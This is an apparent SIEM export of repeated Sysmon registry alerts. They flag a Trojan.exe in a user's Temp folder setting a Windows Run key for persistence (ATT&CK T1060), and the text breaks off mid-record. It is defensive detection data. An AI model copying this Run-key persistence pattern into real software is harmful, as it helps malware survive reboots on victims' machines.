HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:31.893"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:44.097",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:30.877 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:30.924483400Z"",""eventRecordID"":""1404"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:30.877\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:30.877"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:43.085",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:29.832 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:29.878416100Z"",""eventRecordID"":""1403"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:29.832\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:29.832"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:42.020",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:28.690 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:28.703860200Z"",""eventRecordID"":""1402"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:28.690\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:28.690"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:40.818",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:27.658 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:27.666601600Z"",""eventRecordID"":""1401"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:27.658\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:27.658"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:39.770",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:26.612 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:26.636758200Z"",""eventRecordID"":""1400"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:26.612\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:26.612"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:38.775",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:25.580 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:25.582755400Z"",""eventRecordID"":""1399"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:25.580\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:25.580"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:37.692",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:24.564 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:24.568179200Z"",""eventRecordID"":""1398"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:24.564\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:24.564"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:36.692",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:23.533 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:23.538072300Z"",""eventRecordID"":""1397"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:23.533\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 
13:24:23.533"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:35.629",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:22.502 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:22.504784200Z"",""eventRecordID"":""1396"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:22.502\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 
HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:22.502"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:21:34.617",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:21.487 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" 
..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:21.491083300Z"",""eventRecordID"":""1395"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:21.487\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:24:21.487"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." 
+"May 24, 2020 @ 16:21:33.613",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:24:20.471 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:24:20.486270200Z"",""eventRecordID"":""1394"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:24:20.471\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: 